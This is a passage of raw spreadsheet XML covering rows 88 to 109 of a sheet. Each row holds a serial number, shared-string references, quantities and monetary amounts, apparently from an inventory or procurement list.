    <row r="88" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A88" s="25"/>
      <c r="B88" s="23">
        <v>177</v>
      </c>
      <c r="C88" s="257" t="s">
        <v>4329</v>
      </c>
      <c r="D88" s="258" t="s">
        <v>4330</v>
      </c>
      <c r="E88" s="258" t="s">
        <v>1097</v>
      </c>
      <c r="F88" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G88" s="36">
        <v>1</v>
      </c>
      <c r="H88" s="257" t="s">
        <v>1331</v>
      </c>
      <c r="I88" s="67">
        <v>42735.04</v>
      </c>
      <c r="J88" s="50">
        <v>18480</v>
      </c>
      <c r="K88" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L88" s="47"/>
      <c r="M88" s="47"/>
      <c r="N88" s="47"/>
      <c r="O88" s="47"/>
      <c r="P88" s="47"/>
      <c r="Q88" s="47"/>
      <c r="R88" s="47"/>
      <c r="S88" s="47"/>
      <c r="T88" s="47"/>
      <c r="U88" s="47"/>
      <c r="V88" s="47"/>
      <c r="W88" s="47"/>
      <c r="X88" s="47"/>
      <c r="Y88" s="47"/>
      <c r="Z88" s="47"/>
      <c r="AA88" s="47"/>
      <c r="AB88" s="47"/>
      <c r="AC88" s="47"/>
      <c r="AD88" s="47"/>
      <c r="AE88" s="47"/>
      <c r="AF88" s="47"/>
      <c r="AG88" s="47"/>
    </row>
    <row r="89" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A89" s="25"/>
      <c r="B89" s="23">
        <v>178</v>
      </c>
      <c r="C89" s="257" t="s">
        <v>4331</v>
      </c>
      <c r="D89" s="258" t="s">
        <v>4330</v>
      </c>
      <c r="E89" s="258" t="s">
        <v>4332</v>
      </c>
      <c r="F89" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G89" s="36">
        <v>1</v>
      </c>
      <c r="H89" s="257" t="s">
        <v>1331</v>
      </c>
      <c r="I89" s="67">
        <v>47863.25</v>
      </c>
      <c r="J89" s="50">
        <v>19800</v>
      </c>
      <c r="K89" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L89" s="47"/>
      <c r="M89" s="47"/>
      <c r="N89" s="47"/>
      <c r="O89" s="47"/>
      <c r="P89" s="47"/>
      <c r="Q89" s="47"/>
      <c r="R89" s="47"/>
      <c r="S89" s="47"/>
      <c r="T89" s="47"/>
      <c r="U89" s="47"/>
      <c r="V89" s="47"/>
      <c r="W89" s="47"/>
      <c r="X89" s="47"/>
      <c r="Y89" s="47"/>
      <c r="Z89" s="47"/>
      <c r="AA89" s="47"/>
      <c r="AB89" s="47"/>
      <c r="AC89" s="47"/>
      <c r="AD89" s="47"/>
      <c r="AE89" s="47"/>
      <c r="AF89" s="47"/>
      <c r="AG89" s="47"/>
    </row>
    <row r="90" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A90" s="25"/>
      <c r="B90" s="23">
        <v>179</v>
      </c>
      <c r="C90" s="257" t="s">
        <v>4333</v>
      </c>
      <c r="D90" s="258" t="s">
        <v>4334</v>
      </c>
      <c r="E90" s="258" t="s">
        <v>1097</v>
      </c>
      <c r="F90" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G90" s="36">
        <v>2</v>
      </c>
      <c r="H90" s="257" t="s">
        <v>1331</v>
      </c>
      <c r="I90" s="67">
        <v>85470.09</v>
      </c>
      <c r="J90" s="50">
        <v>37400</v>
      </c>
      <c r="K90" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L90" s="47"/>
      <c r="M90" s="47"/>
      <c r="N90" s="47"/>
      <c r="O90" s="47"/>
      <c r="P90" s="47"/>
      <c r="Q90" s="47"/>
      <c r="R90" s="47"/>
      <c r="S90" s="47"/>
      <c r="T90" s="47"/>
      <c r="U90" s="47"/>
      <c r="V90" s="47"/>
      <c r="W90" s="47"/>
      <c r="X90" s="47"/>
      <c r="Y90" s="47"/>
      <c r="Z90" s="47"/>
      <c r="AA90" s="47"/>
      <c r="AB90" s="47"/>
      <c r="AC90" s="47"/>
      <c r="AD90" s="47"/>
      <c r="AE90" s="47"/>
      <c r="AF90" s="47"/>
      <c r="AG90" s="47"/>
    </row>
    <row r="91" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A91" s="25"/>
      <c r="B91" s="23">
        <v>180</v>
      </c>
      <c r="C91" s="257" t="s">
        <v>4335</v>
      </c>
      <c r="D91" s="258" t="s">
        <v>4336</v>
      </c>
      <c r="E91" s="258" t="s">
        <v>4337</v>
      </c>
      <c r="F91" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G91" s="36">
        <v>1</v>
      </c>
      <c r="H91" s="257" t="s">
        <v>3085</v>
      </c>
      <c r="I91" s="67">
        <v>487658.12</v>
      </c>
      <c r="J91" s="50">
        <v>211200</v>
      </c>
      <c r="K91" s="259" t="s">
        <v>4338</v>
      </c>
      <c r="L91" s="47"/>
      <c r="M91" s="47"/>
      <c r="N91" s="47"/>
      <c r="O91" s="47"/>
      <c r="P91" s="47"/>
      <c r="Q91" s="47"/>
      <c r="R91" s="47"/>
      <c r="S91" s="47"/>
      <c r="T91" s="47"/>
      <c r="U91" s="47"/>
      <c r="V91" s="47"/>
      <c r="W91" s="47"/>
      <c r="X91" s="47"/>
      <c r="Y91" s="47"/>
      <c r="Z91" s="47"/>
      <c r="AA91" s="47"/>
      <c r="AB91" s="47"/>
      <c r="AC91" s="47"/>
      <c r="AD91" s="47"/>
      <c r="AE91" s="47"/>
      <c r="AF91" s="47"/>
      <c r="AG91" s="47"/>
    </row>
    <row r="92" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A92" s="25"/>
      <c r="B92" s="23">
        <v>181</v>
      </c>
      <c r="C92" s="257" t="s">
        <v>4339</v>
      </c>
      <c r="D92" s="258" t="s">
        <v>4340</v>
      </c>
      <c r="E92" s="66"/>
      <c r="F92" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G92" s="36">
        <v>1</v>
      </c>
      <c r="H92" s="257" t="s">
        <v>1417</v>
      </c>
      <c r="I92" s="67">
        <v>300000</v>
      </c>
      <c r="J92" s="50">
        <v>139200</v>
      </c>
      <c r="K92" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L92" s="47"/>
      <c r="M92" s="47"/>
      <c r="N92" s="47"/>
      <c r="O92" s="47"/>
      <c r="P92" s="47"/>
      <c r="Q92" s="47"/>
      <c r="R92" s="47"/>
      <c r="S92" s="47"/>
      <c r="T92" s="47"/>
      <c r="U92" s="47"/>
      <c r="V92" s="47"/>
      <c r="W92" s="47"/>
      <c r="X92" s="47"/>
      <c r="Y92" s="47"/>
      <c r="Z92" s="47"/>
      <c r="AA92" s="47"/>
      <c r="AB92" s="47"/>
      <c r="AC92" s="47"/>
      <c r="AD92" s="47"/>
      <c r="AE92" s="47"/>
      <c r="AF92" s="47"/>
      <c r="AG92" s="47"/>
    </row>
    <row r="93" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A93" s="25"/>
      <c r="B93" s="23">
        <v>182</v>
      </c>
      <c r="C93" s="257" t="s">
        <v>4341</v>
      </c>
      <c r="D93" s="258" t="s">
        <v>3233</v>
      </c>
      <c r="E93" s="258" t="s">
        <v>4342</v>
      </c>
      <c r="F93" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G93" s="36">
        <v>2</v>
      </c>
      <c r="H93" s="257" t="s">
        <v>1417</v>
      </c>
      <c r="I93" s="67">
        <v>16034.19</v>
      </c>
      <c r="J93" s="50">
        <v>16000</v>
      </c>
      <c r="K93" s="259" t="s">
        <v>4343</v>
      </c>
      <c r="L93" s="47"/>
      <c r="M93" s="47"/>
      <c r="N93" s="47"/>
      <c r="O93" s="47"/>
      <c r="P93" s="47"/>
      <c r="Q93" s="47"/>
      <c r="R93" s="47"/>
      <c r="S93" s="47"/>
      <c r="T93" s="47"/>
      <c r="U93" s="47"/>
      <c r="V93" s="47"/>
      <c r="W93" s="47"/>
      <c r="X93" s="47"/>
      <c r="Y93" s="47"/>
      <c r="Z93" s="47"/>
      <c r="AA93" s="47"/>
      <c r="AB93" s="47"/>
      <c r="AC93" s="47"/>
      <c r="AD93" s="47"/>
      <c r="AE93" s="47"/>
      <c r="AF93" s="47"/>
      <c r="AG93" s="47"/>
    </row>
    <row r="94" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A94" s="25"/>
      <c r="B94" s="23">
        <v>183</v>
      </c>
      <c r="C94" s="257" t="s">
        <v>4344</v>
      </c>
      <c r="D94" s="258" t="s">
        <v>3426</v>
      </c>
      <c r="E94" s="258" t="s">
        <v>4345</v>
      </c>
      <c r="F94" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G94" s="36">
        <v>2</v>
      </c>
      <c r="H94" s="257" t="s">
        <v>1417</v>
      </c>
      <c r="I94" s="67">
        <v>12000</v>
      </c>
      <c r="J94" s="50">
        <v>5280</v>
      </c>
      <c r="K94" s="259" t="s">
        <v>4343</v>
      </c>
      <c r="L94" s="47"/>
      <c r="M94" s="47"/>
      <c r="N94" s="47"/>
      <c r="O94" s="47"/>
      <c r="P94" s="47"/>
      <c r="Q94" s="47"/>
      <c r="R94" s="47"/>
      <c r="S94" s="47"/>
      <c r="T94" s="47"/>
      <c r="U94" s="47"/>
      <c r="V94" s="47"/>
      <c r="W94" s="47"/>
      <c r="X94" s="47"/>
      <c r="Y94" s="47"/>
      <c r="Z94" s="47"/>
      <c r="AA94" s="47"/>
      <c r="AB94" s="47"/>
      <c r="AC94" s="47"/>
      <c r="AD94" s="47"/>
      <c r="AE94" s="47"/>
      <c r="AF94" s="47"/>
      <c r="AG94" s="47"/>
    </row>
    <row r="95" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A95" s="25"/>
      <c r="B95" s="23">
        <v>184</v>
      </c>
      <c r="C95" s="257" t="s">
        <v>4346</v>
      </c>
      <c r="D95" s="258" t="s">
        <v>3429</v>
      </c>
      <c r="E95" s="258" t="s">
        <v>3430</v>
      </c>
      <c r="F95" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G95" s="36">
        <v>2</v>
      </c>
      <c r="H95" s="257" t="s">
        <v>1417</v>
      </c>
      <c r="I95" s="67">
        <v>12136.75</v>
      </c>
      <c r="J95" s="50">
        <v>4800</v>
      </c>
      <c r="K95" s="259" t="s">
        <v>4347</v>
      </c>
      <c r="L95" s="47"/>
      <c r="M95" s="47"/>
      <c r="N95" s="47"/>
      <c r="O95" s="47"/>
      <c r="P95" s="47"/>
      <c r="Q95" s="47"/>
      <c r="R95" s="47"/>
      <c r="S95" s="47"/>
      <c r="T95" s="47"/>
      <c r="U95" s="47"/>
      <c r="V95" s="47"/>
      <c r="W95" s="47"/>
      <c r="X95" s="47"/>
      <c r="Y95" s="47"/>
      <c r="Z95" s="47"/>
      <c r="AA95" s="47"/>
      <c r="AB95" s="47"/>
      <c r="AC95" s="47"/>
      <c r="AD95" s="47"/>
      <c r="AE95" s="47"/>
      <c r="AF95" s="47"/>
      <c r="AG95" s="47"/>
    </row>
    <row r="96" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A96" s="25"/>
      <c r="B96" s="23">
        <v>185</v>
      </c>
      <c r="C96" s="257" t="s">
        <v>4348</v>
      </c>
      <c r="D96" s="258" t="s">
        <v>3429</v>
      </c>
      <c r="E96" s="258" t="s">
        <v>1262</v>
      </c>
      <c r="F96" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G96" s="36">
        <v>1</v>
      </c>
      <c r="H96" s="257" t="s">
        <v>1417</v>
      </c>
      <c r="I96" s="67">
        <v>8547.01</v>
      </c>
      <c r="J96" s="50">
        <v>2880</v>
      </c>
      <c r="K96" s="259" t="s">
        <v>4343</v>
      </c>
      <c r="L96" s="25"/>
      <c r="M96" s="25"/>
      <c r="N96" s="47"/>
      <c r="O96" s="47"/>
      <c r="P96" s="47"/>
      <c r="Q96" s="47"/>
      <c r="R96" s="47"/>
      <c r="S96" s="47"/>
      <c r="T96" s="47"/>
      <c r="U96" s="47"/>
      <c r="V96" s="47"/>
      <c r="W96" s="47"/>
      <c r="X96" s="47"/>
      <c r="Y96" s="47"/>
      <c r="Z96" s="47"/>
      <c r="AA96" s="47"/>
      <c r="AB96" s="47"/>
      <c r="AC96" s="47"/>
      <c r="AD96" s="47"/>
      <c r="AE96" s="47"/>
      <c r="AF96" s="47"/>
      <c r="AG96" s="47"/>
    </row>
    <row r="97" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A97" s="25"/>
      <c r="B97" s="23">
        <v>186</v>
      </c>
      <c r="C97" s="257" t="s">
        <v>4349</v>
      </c>
      <c r="D97" s="258" t="s">
        <v>4350</v>
      </c>
      <c r="E97" s="258" t="s">
        <v>4351</v>
      </c>
      <c r="F97" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G97" s="36">
        <v>2</v>
      </c>
      <c r="H97" s="257" t="s">
        <v>1417</v>
      </c>
      <c r="I97" s="67">
        <v>66051.28</v>
      </c>
      <c r="J97" s="50">
        <v>38400</v>
      </c>
      <c r="K97" s="259" t="s">
        <v>4343</v>
      </c>
      <c r="L97" s="25"/>
      <c r="M97" s="25"/>
      <c r="N97" s="47"/>
      <c r="O97" s="47"/>
      <c r="P97" s="47"/>
      <c r="Q97" s="47"/>
      <c r="R97" s="47"/>
      <c r="S97" s="47"/>
      <c r="T97" s="47"/>
      <c r="U97" s="47"/>
      <c r="V97" s="47"/>
      <c r="W97" s="47"/>
      <c r="X97" s="47"/>
      <c r="Y97" s="47"/>
      <c r="Z97" s="47"/>
      <c r="AA97" s="47"/>
      <c r="AB97" s="47"/>
      <c r="AC97" s="47"/>
      <c r="AD97" s="47"/>
      <c r="AE97" s="47"/>
      <c r="AF97" s="47"/>
      <c r="AG97" s="47"/>
    </row>
    <row r="98" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A98" s="25"/>
      <c r="B98" s="23">
        <v>187</v>
      </c>
      <c r="C98" s="257" t="s">
        <v>4352</v>
      </c>
      <c r="D98" s="258" t="s">
        <v>4353</v>
      </c>
      <c r="E98" s="258" t="s">
        <v>4351</v>
      </c>
      <c r="F98" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G98" s="36">
        <v>2</v>
      </c>
      <c r="H98" s="257" t="s">
        <v>1417</v>
      </c>
      <c r="I98" s="67">
        <v>145914.53</v>
      </c>
      <c r="J98" s="50">
        <v>46400</v>
      </c>
      <c r="K98" s="259" t="s">
        <v>4343</v>
      </c>
      <c r="L98" s="25"/>
      <c r="M98" s="25"/>
      <c r="N98" s="47"/>
      <c r="O98" s="47"/>
      <c r="P98" s="47"/>
      <c r="Q98" s="47"/>
      <c r="R98" s="47"/>
      <c r="S98" s="47"/>
      <c r="T98" s="47"/>
      <c r="U98" s="47"/>
      <c r="V98" s="47"/>
      <c r="W98" s="47"/>
      <c r="X98" s="47"/>
      <c r="Y98" s="47"/>
      <c r="Z98" s="47"/>
      <c r="AA98" s="47"/>
      <c r="AB98" s="47"/>
      <c r="AC98" s="47"/>
      <c r="AD98" s="47"/>
      <c r="AE98" s="47"/>
      <c r="AF98" s="47"/>
      <c r="AG98" s="47"/>
    </row>
    <row r="99" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A99" s="25"/>
      <c r="B99" s="23">
        <v>188</v>
      </c>
      <c r="C99" s="257" t="s">
        <v>4354</v>
      </c>
      <c r="D99" s="258" t="s">
        <v>4355</v>
      </c>
      <c r="E99" s="258" t="s">
        <v>4356</v>
      </c>
      <c r="F99" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G99" s="36">
        <v>1</v>
      </c>
      <c r="H99" s="257" t="s">
        <v>776</v>
      </c>
      <c r="I99" s="67">
        <v>115384.62</v>
      </c>
      <c r="J99" s="50">
        <v>37600</v>
      </c>
      <c r="K99" s="259" t="s">
        <v>4357</v>
      </c>
      <c r="L99" s="47"/>
      <c r="M99" s="47"/>
      <c r="N99" s="47"/>
      <c r="O99" s="47"/>
      <c r="P99" s="47"/>
      <c r="Q99" s="47"/>
      <c r="R99" s="47"/>
      <c r="S99" s="47"/>
      <c r="T99" s="47"/>
      <c r="U99" s="47"/>
      <c r="V99" s="47"/>
      <c r="W99" s="47"/>
      <c r="X99" s="47"/>
      <c r="Y99" s="47"/>
      <c r="Z99" s="47"/>
      <c r="AA99" s="47"/>
      <c r="AB99" s="47"/>
      <c r="AC99" s="47"/>
      <c r="AD99" s="47"/>
      <c r="AE99" s="47"/>
      <c r="AF99" s="47"/>
      <c r="AG99" s="47"/>
    </row>
    <row r="100" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A100" s="25"/>
      <c r="B100" s="23">
        <v>189</v>
      </c>
      <c r="C100" s="257" t="s">
        <v>4358</v>
      </c>
      <c r="D100" s="258" t="s">
        <v>4359</v>
      </c>
      <c r="E100" s="258" t="s">
        <v>4360</v>
      </c>
      <c r="F100" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G100" s="36">
        <v>3</v>
      </c>
      <c r="H100" s="257" t="s">
        <v>776</v>
      </c>
      <c r="I100" s="67">
        <v>784615.38</v>
      </c>
      <c r="J100" s="50">
        <v>345168</v>
      </c>
      <c r="K100" s="259" t="s">
        <v>4361</v>
      </c>
      <c r="L100" s="25"/>
      <c r="M100" s="25"/>
      <c r="N100" s="47"/>
      <c r="O100" s="47"/>
      <c r="P100" s="47"/>
      <c r="Q100" s="47"/>
      <c r="R100" s="47"/>
      <c r="S100" s="47"/>
      <c r="T100" s="47"/>
      <c r="U100" s="47"/>
      <c r="V100" s="47"/>
      <c r="W100" s="47"/>
      <c r="X100" s="47"/>
      <c r="Y100" s="47"/>
      <c r="Z100" s="47"/>
      <c r="AA100" s="47"/>
      <c r="AB100" s="47"/>
      <c r="AC100" s="47"/>
      <c r="AD100" s="47"/>
      <c r="AE100" s="47"/>
      <c r="AF100" s="47"/>
      <c r="AG100" s="47"/>
    </row>
    <row r="101" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A101" s="25"/>
      <c r="B101" s="23">
        <v>190</v>
      </c>
      <c r="C101" s="257" t="s">
        <v>4362</v>
      </c>
      <c r="D101" s="258" t="s">
        <v>4363</v>
      </c>
      <c r="E101" s="258" t="s">
        <v>4364</v>
      </c>
      <c r="F101" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G101" s="36">
        <v>1</v>
      </c>
      <c r="H101" s="257" t="s">
        <v>776</v>
      </c>
      <c r="I101" s="67">
        <v>273504.27</v>
      </c>
      <c r="J101" s="50">
        <v>102648</v>
      </c>
      <c r="K101" s="259" t="s">
        <v>4365</v>
      </c>
      <c r="L101" s="25"/>
      <c r="M101" s="25"/>
      <c r="N101" s="47"/>
      <c r="O101" s="47"/>
      <c r="P101" s="47"/>
      <c r="Q101" s="47"/>
      <c r="R101" s="47"/>
      <c r="S101" s="47"/>
      <c r="T101" s="47"/>
      <c r="U101" s="47"/>
      <c r="V101" s="47"/>
      <c r="W101" s="47"/>
      <c r="X101" s="47"/>
      <c r="Y101" s="47"/>
      <c r="Z101" s="47"/>
      <c r="AA101" s="47"/>
      <c r="AB101" s="47"/>
      <c r="AC101" s="47"/>
      <c r="AD101" s="47"/>
      <c r="AE101" s="47"/>
      <c r="AF101" s="47"/>
      <c r="AG101" s="47"/>
    </row>
    <row r="102" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A102" s="25"/>
      <c r="B102" s="23">
        <v>191</v>
      </c>
      <c r="C102" s="257" t="s">
        <v>4366</v>
      </c>
      <c r="D102" s="258" t="s">
        <v>4367</v>
      </c>
      <c r="E102" s="258" t="s">
        <v>4368</v>
      </c>
      <c r="F102" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G102" s="36">
        <v>1</v>
      </c>
      <c r="H102" s="257" t="s">
        <v>776</v>
      </c>
      <c r="I102" s="67">
        <v>179487.18</v>
      </c>
      <c r="J102" s="50">
        <v>67304</v>
      </c>
      <c r="K102" s="259" t="s">
        <v>4369</v>
      </c>
      <c r="L102" s="25"/>
      <c r="M102" s="25"/>
      <c r="N102" s="47"/>
      <c r="O102" s="47"/>
      <c r="P102" s="47"/>
      <c r="Q102" s="47"/>
      <c r="R102" s="47"/>
      <c r="S102" s="47"/>
      <c r="T102" s="47"/>
      <c r="U102" s="47"/>
      <c r="V102" s="47"/>
      <c r="W102" s="47"/>
      <c r="X102" s="47"/>
      <c r="Y102" s="47"/>
      <c r="Z102" s="47"/>
      <c r="AA102" s="47"/>
      <c r="AB102" s="47"/>
      <c r="AC102" s="47"/>
      <c r="AD102" s="47"/>
      <c r="AE102" s="47"/>
      <c r="AF102" s="47"/>
      <c r="AG102" s="47"/>
    </row>
    <row r="103" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A103" s="25"/>
      <c r="B103" s="23">
        <v>192</v>
      </c>
      <c r="C103" s="257" t="s">
        <v>4370</v>
      </c>
      <c r="D103" s="258" t="s">
        <v>4371</v>
      </c>
      <c r="E103" s="258" t="s">
        <v>4372</v>
      </c>
      <c r="F103" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G103" s="36">
        <v>1</v>
      </c>
      <c r="H103" s="257" t="s">
        <v>776</v>
      </c>
      <c r="I103" s="67">
        <v>34188.03</v>
      </c>
      <c r="J103" s="50">
        <v>12784</v>
      </c>
      <c r="K103" s="259" t="s">
        <v>4369</v>
      </c>
      <c r="L103" s="25"/>
      <c r="M103" s="25"/>
      <c r="N103" s="47"/>
      <c r="O103" s="47"/>
      <c r="P103" s="47"/>
      <c r="Q103" s="47"/>
      <c r="R103" s="47"/>
      <c r="S103" s="47"/>
      <c r="T103" s="47"/>
      <c r="U103" s="47"/>
      <c r="V103" s="47"/>
      <c r="W103" s="47"/>
      <c r="X103" s="47"/>
      <c r="Y103" s="47"/>
      <c r="Z103" s="47"/>
      <c r="AA103" s="47"/>
      <c r="AB103" s="47"/>
      <c r="AC103" s="47"/>
      <c r="AD103" s="47"/>
      <c r="AE103" s="47"/>
      <c r="AF103" s="47"/>
      <c r="AG103" s="47"/>
    </row>
    <row r="104" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A104" s="25"/>
      <c r="B104" s="23">
        <v>193</v>
      </c>
      <c r="C104" s="257" t="s">
        <v>4373</v>
      </c>
      <c r="D104" s="258" t="s">
        <v>4374</v>
      </c>
      <c r="E104" s="258" t="s">
        <v>4375</v>
      </c>
      <c r="F104" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G104" s="36">
        <v>1</v>
      </c>
      <c r="H104" s="257" t="s">
        <v>3085</v>
      </c>
      <c r="I104" s="67">
        <v>15213.68</v>
      </c>
      <c r="J104" s="50">
        <v>4840</v>
      </c>
      <c r="K104" s="259" t="s">
        <v>1784</v>
      </c>
      <c r="L104" s="25"/>
      <c r="M104" s="25"/>
      <c r="N104" s="47"/>
      <c r="O104" s="47"/>
      <c r="P104" s="47"/>
      <c r="Q104" s="47"/>
      <c r="R104" s="47"/>
      <c r="S104" s="47"/>
      <c r="T104" s="47"/>
      <c r="U104" s="47"/>
      <c r="V104" s="47"/>
      <c r="W104" s="47"/>
      <c r="X104" s="47"/>
      <c r="Y104" s="47"/>
      <c r="Z104" s="47"/>
      <c r="AA104" s="47"/>
      <c r="AB104" s="47"/>
      <c r="AC104" s="47"/>
      <c r="AD104" s="47"/>
      <c r="AE104" s="47"/>
      <c r="AF104" s="47"/>
      <c r="AG104" s="47"/>
    </row>
    <row r="105" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A105" s="25"/>
      <c r="B105" s="23">
        <v>194</v>
      </c>
      <c r="C105" s="257" t="s">
        <v>4376</v>
      </c>
      <c r="D105" s="258" t="s">
        <v>4377</v>
      </c>
      <c r="E105" s="66"/>
      <c r="F105" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G105" s="36">
        <v>1</v>
      </c>
      <c r="H105" s="257" t="s">
        <v>1008</v>
      </c>
      <c r="I105" s="67">
        <v>160377.36</v>
      </c>
      <c r="J105" s="50">
        <v>74240</v>
      </c>
      <c r="K105" s="259" t="s">
        <v>4378</v>
      </c>
      <c r="L105" s="25"/>
      <c r="M105" s="25"/>
      <c r="N105" s="47"/>
      <c r="O105" s="47"/>
      <c r="P105" s="47"/>
      <c r="Q105" s="47"/>
      <c r="R105" s="47"/>
      <c r="S105" s="47"/>
      <c r="T105" s="47"/>
      <c r="U105" s="47"/>
      <c r="V105" s="47"/>
      <c r="W105" s="47"/>
      <c r="X105" s="47"/>
      <c r="Y105" s="47"/>
      <c r="Z105" s="47"/>
      <c r="AA105" s="47"/>
      <c r="AB105" s="47"/>
      <c r="AC105" s="47"/>
      <c r="AD105" s="47"/>
      <c r="AE105" s="47"/>
      <c r="AF105" s="47"/>
      <c r="AG105" s="47"/>
    </row>
    <row r="106" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A106" s="25"/>
      <c r="B106" s="23">
        <v>195</v>
      </c>
      <c r="C106" s="257" t="s">
        <v>4379</v>
      </c>
      <c r="D106" s="258" t="s">
        <v>4380</v>
      </c>
      <c r="E106" s="258" t="s">
        <v>4381</v>
      </c>
      <c r="F106" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G106" s="36">
        <v>4</v>
      </c>
      <c r="H106" s="257" t="s">
        <v>1008</v>
      </c>
      <c r="I106" s="67">
        <v>6153.85</v>
      </c>
      <c r="J106" s="50">
        <v>3520</v>
      </c>
      <c r="K106" s="259" t="s">
        <v>1784</v>
      </c>
      <c r="L106" s="47"/>
      <c r="M106" s="47"/>
      <c r="N106" s="47"/>
      <c r="O106" s="47"/>
      <c r="P106" s="47"/>
      <c r="Q106" s="47"/>
      <c r="R106" s="47"/>
      <c r="S106" s="47"/>
      <c r="T106" s="47"/>
      <c r="U106" s="47"/>
      <c r="V106" s="47"/>
      <c r="W106" s="47"/>
      <c r="X106" s="47"/>
      <c r="Y106" s="47"/>
      <c r="Z106" s="47"/>
      <c r="AA106" s="47"/>
      <c r="AB106" s="47"/>
      <c r="AC106" s="47"/>
      <c r="AD106" s="47"/>
      <c r="AE106" s="47"/>
      <c r="AF106" s="47"/>
      <c r="AG106" s="47"/>
    </row>
    <row r="107" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A107" s="25"/>
      <c r="B107" s="23">
        <v>199</v>
      </c>
      <c r="C107" s="257" t="s">
        <v>4382</v>
      </c>
      <c r="D107" s="258" t="s">
        <v>4383</v>
      </c>
      <c r="E107" s="258" t="s">
        <v>4384</v>
      </c>
      <c r="F107" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G107" s="36">
        <v>1</v>
      </c>
      <c r="H107" s="257" t="s">
        <v>3541</v>
      </c>
      <c r="I107" s="67">
        <v>29914.53</v>
      </c>
      <c r="J107" s="50">
        <v>12760</v>
      </c>
      <c r="K107" s="259" t="s">
        <v>4385</v>
      </c>
      <c r="L107" s="47"/>
      <c r="M107" s="47"/>
      <c r="N107" s="47"/>
      <c r="O107" s="47"/>
      <c r="P107" s="47"/>
      <c r="Q107" s="47"/>
      <c r="R107" s="47"/>
      <c r="S107" s="47"/>
      <c r="T107" s="47"/>
      <c r="U107" s="47"/>
      <c r="V107" s="47"/>
      <c r="W107" s="47"/>
      <c r="X107" s="47"/>
      <c r="Y107" s="47"/>
      <c r="Z107" s="47"/>
      <c r="AA107" s="47"/>
      <c r="AB107" s="47"/>
      <c r="AC107" s="47"/>
      <c r="AD107" s="47"/>
      <c r="AE107" s="47"/>
      <c r="AF107" s="47"/>
      <c r="AG107" s="47"/>
    </row>
    <row r="108" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A108" s="25"/>
      <c r="B108" s="23">
        <v>200</v>
      </c>
      <c r="C108" s="257" t="s">
        <v>4386</v>
      </c>
      <c r="D108" s="258" t="s">
        <v>4387</v>
      </c>
      <c r="E108" s="258" t="s">
        <v>4388</v>
      </c>
      <c r="F108" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G108" s="36">
        <v>2</v>
      </c>
      <c r="H108" s="257" t="s">
        <v>3541</v>
      </c>
      <c r="I108" s="67">
        <v>27350.43</v>
      </c>
      <c r="J108" s="50">
        <v>11880</v>
      </c>
      <c r="K108" s="259" t="s">
        <v>4385</v>
      </c>
      <c r="L108" s="47"/>
      <c r="M108" s="47"/>
      <c r="N108" s="47"/>
      <c r="O108" s="47"/>
      <c r="P108" s="47"/>
      <c r="Q108" s="47"/>
      <c r="R108" s="47"/>
      <c r="S108" s="47"/>
      <c r="T108" s="47"/>
      <c r="U108" s="47"/>
      <c r="V108" s="47"/>
      <c r="W108" s="47"/>
      <c r="X108" s="47"/>
      <c r="Y108" s="47"/>
      <c r="Z108" s="47"/>
      <c r="AA108" s="47"/>
      <c r="AB108" s="47"/>
      <c r="AC108" s="47"/>
      <c r="AD108" s="47"/>
      <c r="AE108" s="47"/>
      <c r="AF108" s="47"/>
      <c r="AG108" s="47"/>
    </row>
    <row r="109" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A109" s="25"/>
      <c r="B109" s="23">
        <v>218</v>
      </c>
      <c r="C109" s="257" t="s">
        <v>4389</v>
      </c>
      <c r="D109" s="258" t="s">
        <v>1092</v>
      </c>
      <c r="E109" s="258" t="s">
        <v>4390</v>
      </c>
      <c r="F109" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G109" s="36">
        <v>3</v>
      </c>
      <c r="H109" s="257" t="s">
        <v>3566</v>
      </c>
      <c r="I109" s="67">
        <v>53846.15</v>
      </c>
      <c r="J109" s="50">
        <v>20352</v>
      </c>
      <c r="K109" s="259" t="s">
        <v>4391</v>
      </c>
      <c r="L109" s="47"/>
      <c r="M109" s="47"/>
      <c r="N109" s="47"/>
      <c r="O109" s="47"/>
      <c r="P109" s="47"/>
